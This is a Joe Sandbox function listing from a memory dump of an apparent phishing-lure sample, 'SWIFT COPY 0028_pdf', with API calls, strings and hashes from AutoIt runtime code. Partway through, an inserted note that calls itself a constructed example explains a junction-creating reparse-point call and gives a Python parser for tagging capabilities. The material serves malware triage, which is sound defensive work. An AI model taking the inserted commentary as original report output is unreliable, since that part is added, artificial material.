                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                    • API String ID: 3730832054-3931177956
                                                                                    • Opcode ID: 75a74d593dd24ae32d512be9f77878d008897f98234485def51e8cabe511f1fd
                                                                                    • Instruction ID: 9e4d010f8480180f703e964c67e7519533e9be47af9e4781620137123e96fad2
                                                                                    • Opcode Fuzzy Hash: 75a74d593dd24ae32d512be9f77878d008897f98234485def51e8cabe511f1fd
                                                                                    • Instruction Fuzzy Hash: 03D1FE71A04215EFCB209F65D895BAEF7B9FF49700F148865E405AB190DB78EC40EFA2
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 009871FC
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00987247
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: 693246d9efe0f92a2c25bf1662c2cb515244c2ca57c603096b4fd18db99b7a71
                                                                                    • Instruction ID: 08ea5e9b2966b31c42cb1a8b7ab95d616e469ca850b2653f826272fd750183ab
                                                                                    • Opcode Fuzzy Hash: 693246d9efe0f92a2c25bf1662c2cb515244c2ca57c603096b4fd18db99b7a71
                                                                                    • Instruction Fuzzy Hash: E3916B742087019FCB14FF60D851B6EB7A6AF94310F108859F8966B3A3DB34ED4ADB91
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0098E5AB
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0098BEAF), ref: 0098E607
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098E647
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098E68C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098E6C3
                                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0098BEAF), ref: 0098E6CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0098E6DF
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,0098BEAF), ref: 0098E6EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0098E70B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0098E717
                                                                                      • Part of subcall function 00940FA7: __wcsicmp_l.LIBCMT ref: 00941030
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: 50f5d51aba55116a79a27eb541a0382edb86b7adc83cfe3d239031fec5119ec1
                                                                                    • Instruction ID: 235fbd15617dc145df4c0494c8ef611c2cd9e0d6c9b62b91a3d56dc9e9c7a100
                                                                                    • Opcode Fuzzy Hash: 50f5d51aba55116a79a27eb541a0382edb86b7adc83cfe3d239031fec5119ec1
                                                                                    • Instruction Fuzzy Hash: 2E61CF71510215BAEB14EF64CC86FAE7BACBF18714F104515F911E62D0EB74D980CBA0
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0096D292
                                                                                    • GetDriveTypeW.KERNEL32 ref: 0096D2DF
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096D327
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096D35E
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096D38C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 1148790751-4113822522
                                                                                    • Opcode ID: 9cb37586312c0933a5d28bceef507151bd2493963ccb965d3c5b08e4b2f4086d
                                                                                    • Instruction ID: bd984e2d4ca301bcde98df7b26531051a6f28a1ccae826bc668cd6ad39c362fa
                                                                                    • Opcode Fuzzy Hash: 9cb37586312c0933a5d28bceef507151bd2493963ccb965d3c5b08e4b2f4086d
                                                                                    • Instruction Fuzzy Hash: 9F513D716043159FC700EF10D991A6EB7E8FF98758F10886DF896A72A1DB31EE05CB92
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00993973,00000016,0000138C,00000016,?,00000016,009BDDB4,00000000,?), ref: 009626F1
                                                                                    • LoadStringW.USER32(00000000,?,00993973,00000016), ref: 009626FA
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00993973,00000016,0000138C,00000016,?,00000016,009BDDB4,00000000,?,00000016), ref: 0096271C
                                                                                    • LoadStringW.USER32(00000000,?,00993973,00000016), ref: 0096271F
                                                                                    • __swprintf.LIBCMT ref: 0096276F
                                                                                    • __swprintf.LIBCMT ref: 00962780
                                                                                    • _wprintf.LIBCMT ref: 00962829
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00962840
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 618562835-2268648507
                                                                                    • Opcode ID: b2bc33770a9fe907ac664c535fad83f4a977ced4c8fdd6eb2a521524982d39d0
                                                                                    • Instruction ID: a452a09cdfb8ed5be6629ad5a087e20910e248e61494cce97f43f2e318c5c793
                                                                                    • Opcode Fuzzy Hash: b2bc33770a9fe907ac664c535fad83f4a977ced4c8fdd6eb2a521524982d39d0
                                                                                    • Instruction Fuzzy Hash: CB416F72804229BACB14FBE0ED86FEEB778AF94344F104065B50177096EA746F59CBA1
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0096D0D8
                                                                                    • __swprintf.LIBCMT ref: 0096D0FA
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0096D137
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0096D15C
                                                                                    • _memset.LIBCMT ref: 0096D17B
                                                                                    • _wcsncpy.LIBCMT ref: 0096D1B7
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0096D1EC
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096D1F7
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0096D200
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096D20A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: 8bb5353f1628dc53d408a83cee6791128234c7b27e373a92c8b059a5c7faea17
                                                                                    • Instruction ID: 561d0b8439d16a37f5670318b46245e15006c1ad451ed12c1f5eb89e40400406
                                                                                    • Opcode Fuzzy Hash: 8bb5353f1628dc53d408a83cee6791128234c7b27e373a92c8b059a5c7faea17
                                                                                    • Instruction Fuzzy Hash: 8731B2B2A14109ABDB21DFA0CC49FEF37BCEF89740F1040B6FA19D2160EB7096448B64
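Triage note on the records above: the strings they carry (the @GUI_DRAGFILE / @GUI_DRAGID / @GUI_DROPID macros, the "Line %d (File "%s"):" / "^ ERROR" runtime error format, the "set cd door open" MCI command, the ControlTreeView verbs CHECK/COLLAPSE/EXPAND) belong to the AutoIt3 interpreter's built-in library, so these functions describe the runtime the sample was compiled with rather than the script it carries. The one worth a second look when reading such listings is the record ending at the line above: CreateFileW with access 40000000 (GENERIC_WRITE) and flags 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT) on a freshly created directory, followed by DeviceIoControl with control code 000900A4 and the "\??\%s" format string. 0x900A4 is FSCTL_SET_REPARSE_POINT (device type 9 = FILE_DEVICE_FILE_SYSTEM, function 41, METHOD_BUFFERED), i.e. the sequence that creates an NTFS junction, which AutoIt exposes as a library function. The script below is an added example, not part of this report or of Joe Sandbox: it parses records in this "APIs / Strings / Similarity" layout, decodes DeviceIoControl control codes with the standard CTL_CODE field layout, and tags the record with capability labels. The tag names, the abridged two-record sample and the tagging rules are constructed for illustration; the CTL_CODE decoding and the three FSCTL values are the documented Windows constants.

```python
"""Parser for Joe Sandbox IDA-plugin function records ("APIs", "Strings",
"Similarity" blocks) plus a small capability-tagging pass.
Added example; not part of the report or of Joe Sandbox."""
import re

# Constructed, abridged copies of two records from the listing, kept in the
# report's own layout so the parser can be exercised offline.
SAMPLE = r"""APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0096D0D8
• __swprintf.LIBCMT ref: 0096D0FA
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0096D137
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0096D15C
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0096D1EC
• CloseHandle.KERNEL32(00000000), ref: 0096D1F7
Strings
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• Opcode ID: 8bb5353f1628dc53d408a83cee6791128234c7b27e373a92c8b059a5c7faea17
APIs
  • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
• CharLowerBuffW.USER32(?,?), ref: 0096D292
• GetDriveTypeW.KERNEL32 ref: 0096D2DF
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096D327
Strings
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• Opcode ID: 9cb37586312c0933a5d28bceef507151bd2493963ccb965d3c5b08e4b2f4086d
"""

# One API line: optional "Part of subcall function XXXX: " prefix, Name.MODULE,
# optional "(args)", then "ref: <address>".  Some entries have no parentheses.
API_RE = re.compile(
    r"^•\s+(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s+)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
# "API ID", "String ID", "API String ID", "Opcode ID", "Instruction ID" lines.
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+ ID):\s*(?P<val>.*)$")

# Documented Windows control codes; the decoder is the standard CTL_CODE layout.
KNOWN_IOCTLS = {
    0x000900A4: "FSCTL_SET_REPARSE_POINT",
    0x000900A8: "FSCTL_GET_REPARSE_POINT",
    0x000900AC: "FSCTL_DELETE_REPARSE_POINT",
}


def parse_records(text):
    """Split the listing into records, one per 'APIs' heading."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "strings": [], "ids": {}}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append({
                "name": m["name"], "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": m["ref"], "subcall": bool(m["sub"]),
            })
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m["key"], m["val"].strip()
            if key == "String ID":
                cur["strings"] = val.split("$")   # the report joins strings with '$'
            else:
                cur["ids"][key] = val
    return records


def decode_ioctl(code):
    """Break a CTL_CODE value into device type, access, function and method."""
    return {"device": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": code & 3,
            "name": KNOWN_IOCTLS.get(code)}


def tag_record(rec):
    """Capability tags (hypothetical names) derived from one record."""
    tags = set()
    for api in rec["apis"]:
        if api["name"] == "DeviceIoControl" and len(api["args"]) > 1 \
                and re.fullmatch(r"[0-9A-Fa-f]+", api["args"][1]):
            if decode_ioctl(int(api["args"][1], 16))["name"] == "FSCTL_SET_REPARSE_POINT":
                tags.add("reparse-point-write")
    strings = rec["strings"]
    # NT-path prefix formatted into the reparse buffer: a junction target.
    if "reparse-point-write" in tags and any(s.startswith("\\??\\") for s in strings):
        tags.add("ntfs-junction-create")
    if any(s.startswith("set cd door") for s in strings) \
            and any(a["name"] == "mciSendStringW" for a in rec["apis"]):
        tags.add("autoit-cdtray")
    if any(s.startswith(("@GUI_DRAG", "@GUI_DROP")) for s in strings):
        tags.add("autoit-gui-drop-macros")
    return tags


def summarize(text):
    """[(first 12 hex chars of Opcode ID, sorted tags)] for every record."""
    return [(rec["ids"].get("Opcode ID", "?")[:12], sorted(tag_record(rec)))
            for rec in parse_records(text)]


if __name__ == "__main__":
    for opcode_id, tags in summarize(SAMPLE):
        print(opcode_id, ", ".join(tags) or "-")
```

Feeding the whole function listing of a report through summarize() yields one line per record; records that tag only as AutoIt library routines can be set aside, and the reparse-point writer stands out because the control code is decoded rather than matched as an opaque hex string, so a renamed or differently ordered record with the same IOCTL still hits.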
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0098BEF4,?,?), ref: 0098E754
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E76B
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E776
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E783
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0098E78C
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E79B
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0098E7A4
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E7AB
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E7BC
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,009AD9BC,?), ref: 0098E7D5
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0098E7E5
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0098E809
                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0098E834
                                                                                    • DeleteObject.GDI32(00000000), ref: 0098E85C
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0098E872
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 235609b15b7b83f56775f1a498413e484c41a36282766c3c12f90762ca6506a5
                                                                                    • Instruction ID: 24f956f5072c352c7bb5ad25afbfe23505742fe70445ce98b3e575aa5367accf
                                                                                    • Opcode Fuzzy Hash: 235609b15b7b83f56775f1a498413e484c41a36282766c3c12f90762ca6506a5
                                                                                    • Instruction Fuzzy Hash: 85414975601204EFDB119F65CC88EAE7BB9EF8A715F108058F906D7260D7309D41EBA0
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 0097076F
                                                                                    • _wcscat.LIBCMT ref: 00970787
                                                                                    • _wcscat.LIBCMT ref: 00970799
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009707AE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009707C2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009707DA
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 009707F4
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970806
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: f8fd577bb8d0776151d34b179a813de2f14fa7aac9506882fa7f0af712336189
                                                                                    • Instruction ID: 859d696495983b82aaab9ff38b86206ab02ced4ec79513d82fb429f083fda72c
                                                                                    • Opcode Fuzzy Hash: f8fd577bb8d0776151d34b179a813de2f14fa7aac9506882fa7f0af712336189
                                                                                    • Instruction Fuzzy Hash: CF817F72504301DFCB24EF24C855AAEB7E8BBC8304F148D2EF889D7251EA34E9548B92
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0098EF3B
                                                                                    • GetFocus.USER32 ref: 0098EF4B
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0098EF56
                                                                                    • _memset.LIBCMT ref: 0098F081
                                                                                    • GetMenuItemInfoW.USER32 ref: 0098F0AC
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0098F0CC
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0098F0DF
                                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0098F113
                                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0098F15B
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0098F193
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0098F1C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: eef35bc7e0d3fac177c2391671f398150cb223a6a0ef22887158341018e69943
                                                                                    • Instruction ID: 48cc3b2925fa1bea48236f0d3eb7a9eca5ee9c3934cb16bc1942121f14cb2ed9
                                                                                    • Opcode Fuzzy Hash: eef35bc7e0d3fac177c2391671f398150cb223a6a0ef22887158341018e69943
                                                                                    • Instruction Fuzzy Hash: 82818D71609301AFDB20EF14C898A6BBBE9FF89714F00592EF99597391D730D905CBA2
                                                                                    APIs
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0095ABD7
                                                                                      • Part of subcall function 0095ABBB: GetLastError.KERNEL32(?,0095A69F,?,?,?), ref: 0095ABE1
                                                                                      • Part of subcall function 0095ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0095A69F,?,?,?), ref: 0095ABF0
                                                                                      • Part of subcall function 0095ABBB: HeapAlloc.KERNEL32(00000000,?,0095A69F,?,?,?), ref: 0095ABF7
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0095AC0E
                                                                                      • Part of subcall function 0095AC56: GetProcessHeap.KERNEL32(00000008,0095A6B5,00000000,00000000,?,0095A6B5,?), ref: 0095AC62
                                                                                      • Part of subcall function 0095AC56: HeapAlloc.KERNEL32(00000000,?,0095A6B5,?), ref: 0095AC69
                                                                                      • Part of subcall function 0095AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0095A6B5,?), ref: 0095AC7A
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0095A8CB
                                                                                    • _memset.LIBCMT ref: 0095A8E0
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0095A8FF
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A910
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0095A94D
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0095A969
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A986
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0095A995
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0095A99C
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0095A9BD
                                                                                    • CopySid.ADVAPI32(00000000), ref: 0095A9C4
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0095A9F5
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0095AA1B
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0095AA2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
